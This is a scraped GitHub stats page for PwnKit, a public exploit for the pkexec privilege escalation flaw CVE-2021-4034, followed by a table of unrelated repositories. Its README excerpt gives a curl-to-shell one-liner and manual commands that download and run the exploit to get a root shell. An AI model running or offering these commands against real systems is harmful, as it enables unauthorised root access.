ly4k/PwnKit

Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

CMakefileShellcve-2021-4034
This is stars and forks stats for /ly4k/PwnKit repository. As of 09 May, 2024 this repository has 883 stars and 173 forks.

PwnKit Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation Usage Should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS. sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)" Manually curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit chmod +x ./PwnKit ./PwnKit # interactive shell ./PwnKit 'id' # single command Patched Running the exploit against patched versions will...
Read on GithubGithub Stats Page
repotechsstarsweeklyforksweekly
luischaparroc/holbertonschool-low_level_programmingCOther7503140
mecomonteshbtn/C-low_level_programmingCOther13903140
HMBSbige/ShadowsocksR-WindowsC#JavaScriptOther6.7k01.1k0
CommunityToolkit/WindowsCommunityToolkitC#Other5.6k01.4k0
chvancooten/maldev-for-dummiesNimC#Rust1.3k+59167+4
alastairtree/LazyCacheC#HTMLPowerShell1.6k+2151+1
chromaticbum/clojure.net.coreClojure0010
kanej/eviltalkingrabbitClojure3000
jepsen-io/local-fsClojure11030
janlimpens/jquery.stretchCoffeeScript0000